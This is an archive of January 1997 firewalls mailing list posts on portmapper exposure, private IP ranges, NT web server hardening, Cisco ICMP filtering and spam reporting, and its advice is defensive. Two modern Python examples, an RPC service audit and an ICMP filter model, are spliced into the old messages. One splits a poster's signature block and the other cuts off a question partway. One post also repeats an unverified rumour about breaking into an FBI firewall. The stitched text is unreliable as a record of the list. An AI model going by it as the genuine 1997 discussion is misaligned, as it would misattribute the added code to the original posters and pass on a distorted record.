I help out a small ISP. Imagine how considerate it is of the other users of the ISP when some rude person drops a mailbomb. A spammer signs up for an account and then sends the spam. The spam may point to a web page on another ISP; then the spammer is off to another ISP to do the same thing. Some only login to the ISP once. The spammers seem as clever as the mailbombers are short-sighted.

A simple report to either "abuse@someisp.net" or "postmaster@someisp.net" is sufficient. Notice the "or"; both addresses frequently end up going to the same group of people or person.

I apologize for the off-topic followup, but mailbombers really irk me.

--
Mike Murphy mrm@Mole.ORG +1 619 598 5874
Better is the enemy of Good

From firewalls-owner Fri Jan 10 06:44:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA04845 for firewalls-outgoing; Fri, 10 Jan 1997 06:27:00 -0800 (PST) Received: from polaris.pacificnet.net (polaris.pacificnet.net [207.171.0.250]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA04838 for ; Fri, 10 Jan 1997 06:26:53 -0800 (PST) From: osiris@pacificnet.com Received: from lwash (pm1-22.pacificnet.net [207.171.17.23]) by polaris.pacificnet.net (8.6.11/8.6.11) with SMTP id GAA26965; Fri, 10 Jan 1997 06:25:42 -0800 Message-ID: <32D65FFE.8B1@pacificnet.com> Date: Fri, 10 Jan 1997 07:27:58 -0800 Organization: - X-Mailer: Mozilla 3.01Gold (Win95; I) MIME-Version: 1.0 To: KENNETH PHANG CC: "'Firewall digest'" Subject: Re: Government and National Security References: <01BBFE3C.05A4CD40@sos.dataprep.com.my> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

KENNETH PHANG wrote:
>
> Hi all,
>
>
Currently I am doing research on the Electronic Government Information System and National Security related to computer security and access, and wonder if anybody can point out where I can get more information on these issues. I would be grateful for any related URL. I would like to make an apology to everybody on the list if my question is a bit off topic.
>

Hi Kent.

(Some people here may not currently have the document listed below and therefore, I have posted it instead of making a mail reply.)

You need this document:

"Electronic Resources for Security Related Information"
CIAC-2307 R.1, Richard Feingold

The document is available here: ftp://ciac.llnl.gov (128.115.19.53) at Lawrence Livermore Labs. The HTTP address is: http://ciac.llnl.gov/cgi-bin/index/documents.

The document is basically a large collection of links, FTP sites, HTTP sites, mailing addresses and bulletin boards. (It is, to my knowledge, only available in Acrobat format. You'll need to get the plugin or a shareware version of Adobe Acrobat to read it. You can get that software here: http://www.adobe.com/prodindex/acrobat/readstep.html )

I would bet that you will find what you are looking for in the aforementioned document.
Osiris

From firewalls-owner Fri Jan 10 07:16:26 1997
From: robin.pollard@mail.ing.nl
To: firewalls@GreatCircle.COM
Newsgroups: mail.firewalls
Message-ID: <5b5k77$q5f@cichlid.cichlid.com>
Message-Id: <0013700002238963000002*@MHS>
Subject: A simple firewall requirement ?
Date: Fri, 10 Jan 1997 15:04:59 +0000

I am looking at ways to provide global access to our internal mail system (cc:Mail) for mobile users. We have cc:Mail "post offices" where user mail is stored at various offices throughout the globe, all linked to a central hub here via our own VPN (TCP/IP). The remote users need to be able to make a (TCP/IP) connection from their laptop into the VPN and down to their PO to get mail. We have access to X28 access points in most of the world.
I was thinking of a PPP dialup machine here (accessed via X28) that will route packets from a limited number of IP addresses (the mobile users) to the IP addresses of the mail POs only on the port cc:Mail uses (cc0); all else is of course excluded. Lotus claim cc:Mail sends all its traffic well encrypted but keep the algorithm secret :) We trust the network provider enough to be happy with this.

What sort of hardware can do this? Will a single-box Linux solution do, or can it not filter in that detail? The PPP point is exposed to the world (or anyone who hacks our network provider); what attacks is it open to? Should the PPP box sit outside another filtering router in case it is compromised, or can it be locked down tight with such limited requirements? Any big holes I should be aware of?

TIA,
Robin Pollard
Infrastructure Support
ING Bank International
robin.pollard@mail.ing.nl

From firewalls-owner Fri Jan 10 07:29:32 1997
Date: Fri, 10 Jan 1997 08:08:06 -0800
Message-Id: <199701101608.IAA16747@apu.connectix.com>
To: GARY.MILLS@TRW.COM
From: Rob Sansom
Subject: Re: RCP tcp/udp 111
Cc: firewalls@greatcircle.com

Wow, I'm actually posting, and breaking my New Year's resolution not to write email first thing in the morning...

RPC Portmapper.
Very bad to allow people to connect to this, since they can find out what sorts of RPC services you run on your host (if I'm correct).

At 04:34 PM 1/8/97 -0800, you wrote:
>Can anyone comment on the security of rcp
>tcp/udp port 111.
>
>Regards,
>Gary, Gary Mills@experian.com
>
>
>

From firewalls-owner Fri Jan 10 08:07:14 1997
Message-ID: <32D66418.6E3B@hon.com>
Date: Fri, 10 Jan 1997 10:45:28 -0500
From: Steve Gallipeau
Reply-To: Steve@hon.com
Organization: Team OS/2
To: Michael Brennen
CC: "Steven E. Matkoski" , Firewalls Mailing List
Subject: Re: registered IP addresses?

Michael Brennen wrote:
>
> RFC 1918.
>
> -- Michael (mbrennen@fni.com)
>
> On Thu, 9 Jan 1997, Steven E. Matkoski wrote:
>
> > Does someone know what the registered IP addresses are that should be
> > used for internal networks. These are the addresses that are not routed
> > to the Internet. or even the RFC#?
I believe you can use 192.168.xxx.xxx and 10.10.xxx.xxx

Steve

From firewalls-owner Fri Jan 10 08:33:43 1997
Date: Fri, 10 Jan 1997 10:49:10 -0500 (EST)
From: Paul Danckaert
To: Rob Sansom
cc: GARY.MILLS@TRW.COM, firewalls@GreatCircle.COM
Subject: Re: RCP tcp/udp 111
In-Reply-To: <199701101608.IAA16747@apu.connectix.com>

On Fri, 10 Jan 1997, Rob Sansom wrote:

> Wow, I'm actually posting, and breaking my New Years resolution not to write
> email first thing in the morning...
>
> RPC Portmapper. Very bad to allow people to connect to this, since they can
> find out what sorts of RPC services you run on your host (if I'm correct).

Just to add a comment to this... it's true that allowing lots of people to connect to the portmapper is bad, but I think that people get a false sense of security by either blocking portmap connections, or by running a portmapper in a restricted mode. As portmap simply provides you with an easy way to find the RPC service you are looking for, it's a trivial block to get around.
Simply connecting to the ports within normal RPC service ranges and identifying services on ports will give you exactly the same information that portmap does.. it just takes slightly longer.

My overall recommendation is to block connections to many of those ports, either at a router, firewall.. or on the machine itself. Many OSes have built-in support for packet filtering.. make use of it. (ipfilter, ipfilterd, ipfw, screend, etc..)

Also, consider if you need to run any of these services in the first place. If you have a machine that is a stand-alone server, turn it off, and disable any rpc services running. Then you don't need to worry about it..

paul

From firewalls-owner Fri Jan 10 09:02:58 1997
Message-Id: <199701101620.IAA19160@geocities.com>
From: "Gabriel Dura"
To: "mike"
Cc:
Subject: Re: FW-1 hacked? - Reply
Date: Fri, 10 Jan 1997 18:10:56 +0200

There is a guy, working on his own, who claims he knows how to penetrate the FBI's firewall. As proof I was told that behind the firewall there is another computer 'phi.fbi.gov'. In the case of me being correctly informed and the FBI using FW-1, you have an answer.

Hope it helps,
Gabriel Dura
dura@geocities.com

P.S.
I can not guarantee the accuracy of this information and I can not reveal the person who told me.

----------
> From: mike
> To: firewalls@GreatCircle.COM
> Subject: FW-1 hacked?
> Date: miercuri, ianuarie 08, 1997 16:27
>
> Hi all
> Does anyone know if FW-1 was ever hacked?

From firewalls-owner Fri Jan 10 09:43:23 1997
Date: Fri, 10 Jan 1997 06:59:03 -1000 (HST)
From: Sam Chepkevich
To: uscny8hb@ibmmail.com
cc: Firewalls Mailing List
Subject: Re: registered IP addresses?
In-Reply-To: <32D5061F.2F66@dreamscape.com>

A - 10.0.0.0
B - 172.16.0.0 - 172.31.255.255
C - 192.168.0.0

----------------------------------
Sam Chepkevich  samc@aloha.net
Manager Systems Engineering (Hawaii)
Hawaii OnLine/GST Internet
----------------------------------

On Thu, 9 Jan 1997, Steven E. Matkoski wrote:

> Does someone know what the registered IP addresses are that should be
> used for internal networks. These are the addresses that are not routed
> to the Internet. or even the RFC#?
>
> --
> Thanks!
> -steve.
> matkoski@dreamscape.com
>

From firewalls-owner Fri Jan 10 09:44:37 1997
Date: Fri, 10 Jan 1997 12:59:29 -0500 (EST)
From: "David J. Meltzer"
To: Rob Sansom
cc: firewalls@GreatCircle.COM
Subject: Re: RCP tcp/udp 111
In-Reply-To: <199701101608.IAA16747@apu.connectix.com>

On Fri, 10 Jan 1997, Rob Sansom wrote:

>
> RPC Portmapper. Very bad to allow people to connect to this, since they can
> find out what sorts of RPC services you run on your host (if I'm correct).
>
> At 04:34 PM 1/8/97 -0800, you wrote:
> >Can anyone comment on the security of rcp
> >tcp/udp port 111.
> >

That is certainly a true statement, but by blocking access to the portmap service alone, you are really not preventing anyone from achieving the same results. It is quite feasible to do a UDP scan for RPC services and by looking at the resulting RPC replies build up a list that is identical to what the portmapper will return.

-Dave

--------------------------------+---------------------
David J. Meltzer                | Email: davem@iss.net
Systems Engineer                | Web: www.iss.net
Internet Security Systems, Inc.
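Added example for the portmapper thread above (not code from any poster): Paul's and Dave's point is that closing 111 only hides the directory, so the useful audit is to list what `rpcinfo -p` shows registered on a host you administer and derive which service ports must be filtered or, better, which services to disable. The `rpcinfo -p` output below is constructed, not captured from a real host.

```python
"""Audit the RPC services a host registers, from `rpcinfo -p` output.

Added example for the portmapper thread; not code from any poster.
The sample below is constructed to look like `rpcinfo -p localhost`
on a mid-1990s Unix host; it was not captured from a real machine.
"""
import re
from typing import Dict, FrozenSet, List, NamedTuple, Set, Tuple

SAMPLE_RPCINFO = """\
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp    712  mountd
    100005    1   tcp    714  mountd
    100003    2   udp   2049  nfs
    100021    1   udp    718  nlockmgr
    100024    1   udp    715  status
"""

# One `rpcinfo -p` row: program number, version, transport, port, service name.
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)\s+(\S+)\s*$")


class RpcService(NamedTuple):
    program: int
    version: int
    proto: str
    port: int
    name: str


def parse_rpcinfo(text: str) -> List[RpcService]:
    """Parse `rpcinfo -p` rows; the column header and blank lines are skipped."""
    services = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            services.append(RpcService(int(m[1]), int(m[2]), m[3], int(m[4]), m[5]))
    return services


def exposure_report(services: List[RpcService]) -> Dict[str, List[Tuple[str, int]]]:
    """Group registered services by name: the list of what to disable or keep."""
    report: Dict[str, Set[Tuple[str, int]]] = {}
    for s in services:
        report.setdefault(s.name, set()).add((s.proto, s.port))
    return {name: sorted(ports) for name, ports in report.items()}


def ports_to_filter(services: List[RpcService],
                    keep: FrozenSet[str] = frozenset()) -> Set[Tuple[str, int]]:
    """(proto, port) pairs a host or router filter must close.

    Blocking 111 only removes the directory; each service still answers on
    its own port, so every port of a service not in `keep` is returned,
    and the portmapper's own ports are included unless it is kept.
    Non-portmapper ports are usually assigned dynamically at boot, so the
    durable fix is to disable the service, not to pin its port in a filter.
    """
    return {(s.proto, s.port) for s in services if s.name not in keep}


if __name__ == "__main__":
    svcs = parse_rpcinfo(SAMPLE_RPCINFO)
    for name, ports in sorted(exposure_report(svcs).items()):
        print(f"{name:12s} {ports}")
    print("filter:", sorted(ports_to_filter(svcs, keep=frozenset({"nfs", "mountd"}))))
```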
                                | Fax: (770)395-1972

From firewalls-owner Fri Jan 10 10:09:18 1997
From: Chris Pugrud
To: "'Cary Conover(IS) 13897'"
Cc: Firewalls Mailing list , "'Franke Albert 2 Lt USAFE CSS/SCBS'"
Subject: Security in Depth for a NT 4.0 Web Server
Date: Fri, 10 Jan 1997 10:45:07 -0700

I realize that the question was in regards to a public webserver on a .mil LAN. The part that I responded to was just about how to establish in-depth security on a NT 4.0 webserver, which I felt would be of general interest to the list. I am very aware of the situation of military LAN topology and security procedure. I just responded to a general request for advice.

I appreciate the note, but it has been amazing how many e-mails I have received about contacting the appropriate INFOSEC group. The problem really stems from people setting up web servers that do not have an INFOSEC background. I think if we look around we will find that this is a web-wide problem, not just a military one.
Chris

>-----Original Message-----
>From: Cary Conover(IS) 13897 [SMTP:cconov@exp2.is.xpark.pmh.org]
>Sent: Thursday, January 09, 1997 7:22 AM
>To: Chris Pugrud
>Cc: Firewalls Mailing list; 'Franke Albert 2 Lt USAFE CSS/SCBS'
>Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!!
>
>Chris Pugrud wrote:
>>
>> This really is not as bad of a situation as it seems. Here are a few
>> pointers to vastly increasing the security of the system. This is not
>> the be all or end all of security. I am sure that there are more steps
>> that you can take to increase your security even more. Buyer Beware.
>> Your mileage may vary...
>>
>> Apply sp2 for Windows NT 4.0
>>   SP2 fixes several bugs in the OS and IIS
>>   http://www.microsoft.com/ntserversupport/Default-SL.HTM
>>
>> The machine really should be used only for serving web pages. If you
>> can dedicate a singular machine, even a 486, to just tossing HTTP then
>> you can greatly increase the security.
>> Under Control Panel > Services, only the following MUST be running for
>> a web server:
>>   EventLog
>>   FTP Publishing Service (optional)
>>   Plug and Play (NT 4.0)
>>   Workstation
>>   World Wide Web Publishing Service
>> Only these services should be set "Automatic". All other services
>> should be set "manual." Be careful, your mileage may vary...
>>
>> Use IIS security
>>   IIS has some built-in allow/deny filtering based on IP address
>>   Internet Service Manager > WWW Service Properties > Advanced TAB
>>
>> CGI/BIN is BAD (by default)
>>   Remove scripts and the HTML Administrator if installed
>>   Internet Service Manager > Directories
>>   Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all
>>   others, especially any that you can not identify.
>>   While you are there make sure to go to "logging" and set up logs
>>   Also go to c:\InetPub and set security
>>   NT Explorer > C:\InetPub > right click > properties > security >
>>   permissions
>>     Replace Permissions on Subdirectories
>>     Replace Permissions on Existing Files
>>     Make Everyone Read (RX)(RX)
>>     Make Administrator Full Control (All)(All)
>>     Remove all others
>>   This sets things up so that only the administrator can make changes
>>   and they must be made from the machine.
>>
>> Use the OS security
>>   NT 4.0 has basic packet filtering built in
>>   Control Panel > Network > Protocols > TCP/IP > Properties > IP Address
>>   > Advanced > Enable Security > Configure
>>     Permit Only (TCP Ports) > Add > 80 (http)
>>     Permit Only (UDP Ports) > (leave blank)
>>     Permit Only (IP Protocols) > Add > 6 (TCP)
>>   This really cuts down what the machine can do. If you need to surf
>>   from the machine you may need to add 53 to UDP Ports.
>>   While you are in the control panel, also check your bindings:
>>   Control Panel > Network > Bindings > Show Bindings for "all
>>   protocols."
>>     Make sure that "TCP/IP" is Enabled
>>     Disable all others
>>   Show bindings for "all adapters"
>>     Expand the adapter (click the plus box)
>>     Expand WINS Client
>>     You may need to Enable Workstation if the networking will not start
>>     on reboot
>>     If you do, make sure to disable Server and NetBIOS Interface
>>   Restart your computer
>>
>> Good day and Good luck
>>
>> Chris
>>
>> >-----Original Message-----
>> >From: Franke Albert 2 Lt USAFE CSS/SCBS
>> >[SMTP:albert.franke@ramstein.af.mil]
>> >Sent: Wednesday, January 08, 1997 3:52 AM
>> >To: Firewalls Mailing list
>> >Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!!
>> >
>> >I am responsible for securing (as well as I can) a DEC Alpha running
>> >Windows NT 4.0 and Internet Information Server as our WWW Server. It is
>> >sitting as a node on our LAN and everyone in the world can access it.
>> >I want a program that I can run on it that will allow/disallow blocks of
>> >IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but
>> >not as necessary) it to keep detailed logs. I have heard of O'Reilly's
>> >WebSite, but I don't know if this will do. I do not have funding for an
>> >expensive firewall machine, and it is impractical to add routers into
>> >our LAN. Please help if you have any suggestions. Thanks.
>> >
>> >albert.franke@ramstein.af.mil
>> >Albert E. Franke, 2Lt, USAF
>> >OIC, USAFE Web Tech Support 480-7905
>
>I don't know if you folks caught this or not. He is on a LAN on a
>fairly large Air Force Base in Germany. This means not only is his
>Website open to attack, so are many of the base's computer systems. It
>appears that there are larger issues here than meet the eye.
>
>His Security Squadron should be involved as well as the Communications
>Squadron that is stationed on the base.
>
>With the military it takes a long while to get anything done unless you
>do it yourself on a shoestring. The money comes from above once a year
>in a budget process that is antiquated and very slow to adjust to
>change. This is one area that changes on as frequent as an hour-to-hour
>basis.
>
>There are initiatives going out from the Pentagon to do things about
>this and the President himself has even put out the word to secure the
>military systems. However the priority in the field is not on securing
>the sites. It is on keeping the job they presently have. They are in
>the one-mistake-and-you're-out-of-the-game military. I wish Albert luck.
>Hopefully he can get the Base Commander's attention so that the Comm
>Squadron will put in a firewall at the access point to the Internet on
>the base. Otherwise the whole base's security on their network is
>suspect.
>
>On the other hand there could be security in place and he just is not
>aware that it is there. Chances are the previous is the case.
>
>--
>Cary

From firewalls-owner Fri Jan 10 10:14:20 1997
From: gunni@if.is (Gunnar Ingvi Thorisson)
Message-Id: <199701101801.SAA05841@ilmur.if.is>
Subject: TCP/IP encrypted connection
To: firewalls@GreatCircle.com
Date: Fri, 10 Jan 1997 18:01:29 +0000 (GMT)

I'm looking for a good way to transfer TCP/IP data between two networks (two countries) safely and securely over the Internet. Maybe a router which is capable of encrypting outgoing packets addressed to certain networks? Any ideas would be appreciated.

Thanks and best regards; a reply would be greatly appreciated.

Gunnar Ingvi Thorisson
Iceland Software Inc.
CODA Iceland Inc.
gunni@if.is, gunni@coda.is

From firewalls-owner Fri Jan 10 10:52:11 1997
Message-Id: <199701101800.KAA26710@notesgw2.sybase.com>
To: "Cihan Subasi (Garanti Tic)"
cc: firewall
From: Ryan Russell/SYBASE
Date: 10 Jan 97 10:05:02 EDT
Subject: Re: RealAudio clients behind the FW...

We'll need just a little more detail about your firewall... such as, what kind do you have?

Does it work if you do TCP instead of UDP? (Yes, I know you may not want to keep it that way... this is for testing purposes.)

Ryan

---------- Previous Message ----------
To: firewalls
cc:
From: CihanS @ garanti.com.tr ("Cihan Subasi (Garanti Tic)") @ smtp
Date: 01/10/97 03:32:00 PM
Subject: RealAudio clients behind the FW...

I'm having problems configuring the FW to allow RealAudio packets... Port 7070 seems open but data transmission on a UDP port does not occur... Please help....
Thanks
Cihan

From firewalls-owner Fri Jan 10 12:08:19 1997
Date: Fri, 10 Jan 1997 11:33:50 -0800
From: Lawrence Suto
Message-Id: <199701101933.LAA18177@smcc5.Cadence.COM>
To: gunni@if.is
Subject: Re: TCP/IP encrypted connection
Cc: firewalls@GreatCircle.COM

Take a look at the NetFortress from Digital Secured Networks. It is a powerful device which encrypts the entire TCP packet including the headers.
They can be found at http://www.dsnt.com

-Larry Suto

From firewalls-owner Fri Jan 10 12:10:18 1997
Message-Id: <199701091636.OAA12986@csnnetra1>
From: "Alessandro Jannuzzi"
To: firewalls@GreatCircle.com
Date: Thu, 9 Jan 1997 14:36:15 +0000
Subject: Two port addresses for one service

Dear people,

Could someone tell me if it is possible to bind two port addresses to one single service on Solstice Firewall 2.0?

I really thank you in advance . . .
Alessandro Jannuzzi
jannuzzi@csn.com.br

From firewalls-owner Fri Jan 10 12:20:31 1997
From: PLAMONDON-A@immedia.ca
Date: 10 Jan 97 19:25:00 +0000
Message-Id: <199701101927.AA7481@immedia.ca>
To: firewalls@greatcircle.com
Subject: Fwd: cancel

Please cancel plamondon-a@immedia.ca

----- Original message -----
================================================================================
To: RNET (FIREWALLS@GREATCIRCLE.COM) PLAMONDON-A
From: RNET (jjvaz@ibm.net)
Subject: cancel
Date: 01/ 9/97  Time: 11:56:00AM EST
Form: MAIL  Delivery: Normal
================================================================================

Please cancel...
jjvaz@ibm.net
Thanks

From firewalls-owner Fri Jan 10 12:30:04 1997
Message-Id: <2.2.32.19970109161037.00bf5620@icarus.usanetworks.com>
Date: Thu, 09 Jan 1997 11:10:37 -0500
To: firewalls@GreatCircle.com
From: Alexey Zilber
Subject: Rom based os/web server?

I received the previous month's copy of The Linux Journal (yes, yes, I know.. :-) ). And it talks about a ROM-based stripped-down version of Linux that's been created, for systems that cannot use components that could be damaged from stress (like hard drives). This thing is stored, compressed, in ROM, then gets booted and uncompressed into RAM. This thing might be good for a hard-coded webserver. While it could get hacked, a reboot and a password change should be all that's needed to repair it.
Alex

From firewalls-owner Fri Jan 10 12:30:38 1997
From: ormonde@trem.cnt.org.br (Rodrigo Ormonde)
Message-Id: <9701101924.AA10183@trem.cnt.org.br>
Subject: Re: Notes through Firewall 1, the Dawg
To: fangyou2@panix.com (FaNgYoU2)
Date: Fri, 10 Jan 1997 16:24:13 -0300 (GRNLNDST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "FaNgYoU2" at Jan 9, 97 10:04:39 pm

> Uno. I need to set up a dumb Firewall-1 machine to permit Lotus Notes to
> run on an Intranet. The Notes Admin is sure that Notes can run on just a
> single port. What my equipment showed when I looked at Notes previously
> was that it made a connection on one port, a response came back on a
> different but very close port, some sort of handshake took place and the
> real data transfer started up on a third port. Is it true that Notes can
> be made to run on a single port through a firewall?

Yes. Lotus Notes uses only port 1352/TCP for all its services, including e-mail and replications. We use it here behind a firewall, with just this port opened, and it runs perfectly fine.
--
Rodrigo de La Rocque Ormonde
e-mail: ormonde@cnt.org.br
PGP Public key: finger ormonde@cnt.org.br

From firewalls-owner Fri Jan 10 12:35:50 1997
Message-Id: <3.0.32.19970109101401.00695124@lexicon.ins.com>
Date: Thu, 09 Jan 1997 10:14:32 -0500
To: firewalls@greatcircle.com
From: "Darwin L. Martinez"
Subject: Oracle Timeout Problem Thru FW-1

All:

A remote client is running FW-1 (2.1b) on a Sun Sparc. They are experiencing a problem where their HP servers / Oracle sessions are timing out after 15 minutes of inactivity. The TCP session timeout parameter is set to 7200 sec, so I don't think this is a problem. They are using a Telnet session (via Rumba95) to access the HP servers. They are also utilizing NAT.

I thought that I recalled an issue related to HPUX / Oracle / FW-1, but can't find it (if it even existed) anywhere.

Any ideas? Thanks.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Darwin L.
Martinez Voice: 404-843-5954 Network Systems Engineer Pager: 888-346-1320 International Network Services Vmail: 770-641-4004 Atlanta Office Email: http://www.ins.com "In the mornin' you go gunnin', for the man who stole your water." ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

From firewalls-owner Fri Jan 10 12:41:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA00457 for firewalls-outgoing; Fri, 10 Jan 1997 11:08:08 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id LAA00352 for firewalls@greatcircle.com; Fri, 10 Jan 1997 11:07:31 -0800 (PST) Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA20009 for ; Thu, 9 Jan 1997 08:11:20 -0800 (PST) Received: from gate.hussmann.com (gate.hussmann.com [205.139.246.2]) by Walden.MO.NET (8.8.3/8.6.10) with ESMTP id KAA06735 for ; Thu, 9 Jan 1997 10:19:07 -0600 (CST) Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id KAA14613 for ; Thu, 9 Jan 1997 10:10:23 -0600 Message-Id: <199701091610.KAA14613@gate.hussmann.com> Received: from mail-gate.hussmann.com(129.1.5.4) by gate.hussmann.com via smap (V1.3) id tmp014611; Thu Jan 9 10:10:14 1997 Date: Thu, 9 Jan 1997 10:10:00 -0600 From: "Hicks, Rick" Subject: RE: internal filtering router - filter c To: "'Firewalls List'" X-Mailer: Worldtalk (NetConnex V4.00a)/MIME Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>From: Darren Cromer
>Subject: RE: internal filtering router - filter config?
>
>Why ICMP? I'm curious what inherent risk that would present.

ICMP redirect packets *could* modify your routing table and leave your router/hosts essentially dead.

>I too am setting up a screening firewall, but I want to allow pings to
>traverse the external router. (any advice on how to filter all ICMP
>except
>pings?)
Here is how I allow ping and traceroute through a Cisco router:

access-list 101 permit icmp any xxx.xxx.xxx.x 0.0.0.255 echo
access-list 101 permit icmp any xxx.xxx.xxx.x 0.0.0.255 echo-reply
access-list 101 permit icmp any xxx.xxx.xxx.x 0.0.0.255 unreachable
access-list 101 permit icmp any xxx.xxx.xxx.x 0.0.0.255 time-exceeded

Also, here is the command to block redirects directed to the router; apply it to each interface:

no ip redirects

Rick
________________________________________________
Rick Hicks Systems Specialist Hussmann Corporation rhicks@hussmann.com http://www.hussmann.com

From firewalls-owner Fri Jan 10 13:03:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA05042 for firewalls-outgoing; Fri, 10 Jan 1997 12:11:02 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA04990 for ; Fri, 10 Jan 1997 12:10:35 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id MAA05315; Fri, 10 Jan 1997 12:09:21 -0800 Received: from gate.ups.com(198.80.14.2) by mycroft via smap (V1.3mjr) id sma005313; Fri Jan 10 12:09:03 1997 Received: by gate.ups.com id AA05474 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Fri, 10 Jan 1997 15:08:29 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-2); Fri, 10 Jan 1997 15:08:29 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-1); Fri, 10 Jan 1997 15:08:29 -0500 Date: Fri, 10 Jan 1997 15:08:25 -0500 (EST) From: Dave Wreski X-Sender: tel1dvw@butthead To: firewalls@GreatCircle.COM Subject: Restricting port access Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I understand it is important to explicitly define which ports are acceptable in a firewall, but I don't understand why.
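Editor's added example for Rick Hicks's ICMP access list above (this is not code from his message or from any other post in this thread): a small Python model of what `access-list 101` does to inbound ICMP, so the effect of the four permits can be checked against constructed packets. The assumptions are mine: the protected network 192.0.2.0/24 stands in for `xxx.xxx.xxx.x 0.0.0.255`, and the sample messages are built by hand. Two points a practitioner would want alongside the ACL: ping needs types 8 and 0 (echo, echo-reply), and traceroute needs type 11 (time-exceeded from each intermediate hop) plus type 3 code 3 (port-unreachable from the final hop), so all four lines are required; and ICMP redirects (type 5) are not in the list, so they fall to the access list's implicit deny. Note that Cisco's `no ip redirects` stops the interface from generating redirects; it is the access list that drops redirects arriving from outside.

```python
import ipaddress
import struct

# ICMP message types from RFC 792; these are what the Cisco ACL keywords
# echo, echo-reply, unreachable and time-exceeded name.
ICMP_ECHO_REPLY = 0
ICMP_UNREACHABLE = 3
ICMP_REDIRECT = 5
ICMP_ECHO = 8
ICMP_TIME_EXCEEDED = 11

# Assumed protected network, standing in for "xxx.xxx.xxx.x 0.0.0.255" in the ACL.
PROTECTED_NET = ipaddress.ip_network("192.0.2.0/24")

# Allowlist equivalent to the four "permit icmp any <net> <type>" lines.
# Every other type (redirects included) hits the ACL's implicit deny.
PERMITTED_TYPES = {ICMP_ECHO, ICMP_ECHO_REPLY, ICMP_UNREACHABLE, ICMP_TIME_EXCEEDED}


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, code: int, body: bytes) -> bytes:
    """Assemble a constructed ICMP message with a valid checksum (test input only)."""
    unchecked = struct.pack("!BBH", icmp_type, code, 0) + body
    return struct.pack("!BBH", icmp_type, code, icmp_checksum(unchecked)) + body


def parse_icmp(message: bytes) -> tuple:
    """Return (type, code); reject truncated messages and bad checksums."""
    if len(message) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    # A message carrying a correct checksum sums to zero under the same algorithm.
    if icmp_checksum(message) != 0:
        raise ValueError("bad ICMP checksum")
    icmp_type, code = struct.unpack("!BB", message[:2])
    return icmp_type, code


def filter_icmp(dst_ip: str, message: bytes) -> str:
    """Decide permit/deny for one inbound ICMP message the way access-list 101 would."""
    try:
        icmp_type, code = parse_icmp(message)
    except ValueError as exc:
        return "deny (malformed: %s)" % exc
    if ipaddress.ip_address(dst_ip) not in PROTECTED_NET:
        return "deny (implicit deny: destination outside protected net)"
    if icmp_type in PERMITTED_TYPES:
        return "permit (type %d code %d)" % (icmp_type, code)
    return "deny (implicit deny: type %d not permitted)" % icmp_type


# Constructed sample traffic: what ping and traceroute produce, plus a redirect.
# Error messages carry 4 unused/gateway bytes and the offending IP header (28 bytes here).
_QUOTED_HDR = b"\x45" + b"\x00" * 27
SAMPLES = {
    "ping request":        build_icmp(ICMP_ECHO, 0, struct.pack("!HH", 0x1234, 1) + b"ping"),
    "ping reply":          build_icmp(ICMP_ECHO_REPLY, 0, struct.pack("!HH", 0x1234, 1) + b"ping"),
    "traceroute hop":      build_icmp(ICMP_TIME_EXCEEDED, 0, b"\x00" * 4 + _QUOTED_HDR),
    "traceroute last hop": build_icmp(ICMP_UNREACHABLE, 3, b"\x00" * 4 + _QUOTED_HDR),
    "redirect":            build_icmp(ICMP_REDIRECT, 1, bytes([192, 0, 2, 1]) + _QUOTED_HDR),
}


def run_samples(dst_ip: str = "192.0.2.10") -> dict:
    """Filter every sample towards one protected host; returns {name: decision}."""
    return {name: filter_icmp(dst_ip, msg) for name, msg in SAMPLES.items()}


if __name__ == "__main__":
    for name, decision in run_samples().items():
        print("%-20s %s" % (name, decision))
    print("%-20s %s" % ("outside net", filter_icmp("198.51.100.5", SAMPLES["ping request"])))
```

Running it shows the four ping/traceroute messages permitted into the /24, the redirect and anything addressed outside the network denied, and malformed messages (short or bad checksum) rejected before the type is even consulted.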
